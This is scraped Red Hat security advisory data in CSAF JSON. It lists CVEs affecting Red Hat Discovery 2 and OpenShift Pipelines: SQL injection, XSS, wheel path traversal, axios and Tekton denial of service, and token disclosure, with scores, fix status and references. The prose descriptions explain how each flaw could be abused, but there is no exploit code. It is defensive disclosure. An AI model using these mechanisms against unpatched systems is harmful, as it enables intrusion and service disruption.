"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Django: Django: SQL injection via crafted column aliases in QuerySet.order_by()"
},
{
"cve": "CVE-2026-22029",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-01-10T04:01:03.694749+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428412"
}
],
"notes": [
{
"category": "description",
"text": "A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "RHBZ#2428412",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428412"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-22029",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22029"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx",
"url": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx"
}
],
"release_date": "2026-01-10T02:42:32.736000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects"
},
{
"cve": "CVE-2026-24049",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-01-22T05:00:54.709179+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431959"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal flaw has been discovered in the python wheel too. The unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "wheel: wheel: Privilege Escalation or Arbitrary Code Execution via malicious wheel file unpacking",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24049"
},
{
"category": "external",
"summary": "RHBZ#2431959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431959"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24049"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef",
"url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/releases/tag/0.46.2",
"url": "https://github.com/pypa/wheel/releases/tag/0.46.2"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx",
"url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx"
}
],
"release_date": "2026-01-22T04:02:08.706000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "wheel: wheel: Privilege Escalation or Arbitrary Code Execution via malicious wheel file unpacking"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
}
]
}
RHSA-2026:6170
Vulnerability from csaf_redhat - Published: 2026-03-30 12:14 - Updated: 2026-04-16 11:09A flaw was found in Fulcio, a free-to-use certificate authority. This vulnerability allows a denial of service (DoS) due to excessive memory allocation when processing a malicious OpenID Connect (OIDC) identity token containing numerous period characters.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A denial of service flaw was found in Tekton Pipelines. Any user who can create a TaskRun or PipelineRun to crash the controller cluster-wide by setting .spec.taskRef.resolver (or .spec.pipelineRef.resolver) to a string of 31+ characters. The crash occurs because GenerateDeterministicNameFromSpec produces a name exceeding the 63-character DNS-1123 label limit, and its truncation logic panics on a [-1] slice bound since the generated name contains no spaces. Once crashed, the controller enters a CrashLoopBackOff on restart (as it re-reconciles the offending resource), blocking all CI/CD reconciliation until the resource is manually deleted. Built-in resolvers (git, cluster, bundles, hub) are unaffected due to their short names, but any custom resolver name triggers the bug. The fix truncates the resolver-name prefix instead of the full string, preserving the hash suffix for determinism and uniqueness.
A flaw was found in Tekton Pipelines, specifically in the Tekton Pipelines git resolver. A tenant with permissions to create ResolutionRequests can exploit a path traversal vulnerability via the `pathInRepo` parameter. This allows the tenant to read arbitrary files from the resolver pod's filesystem, leading to information disclosure, including sensitive ServiceAccount tokens. The contents of these files are returned in a base64-encoded format.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The 1.21.1 GA release of Red Hat OpenShift Pipelines Operator..\nFor more details see [product documentation](https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines).",
"title": "Topic"
},
{
"category": "general",
"text": "The 1.21.1 release of Red Hat OpenShift Pipelines Operator.",
"title": "Details"
},
{
"category": "legal_disclaimer",
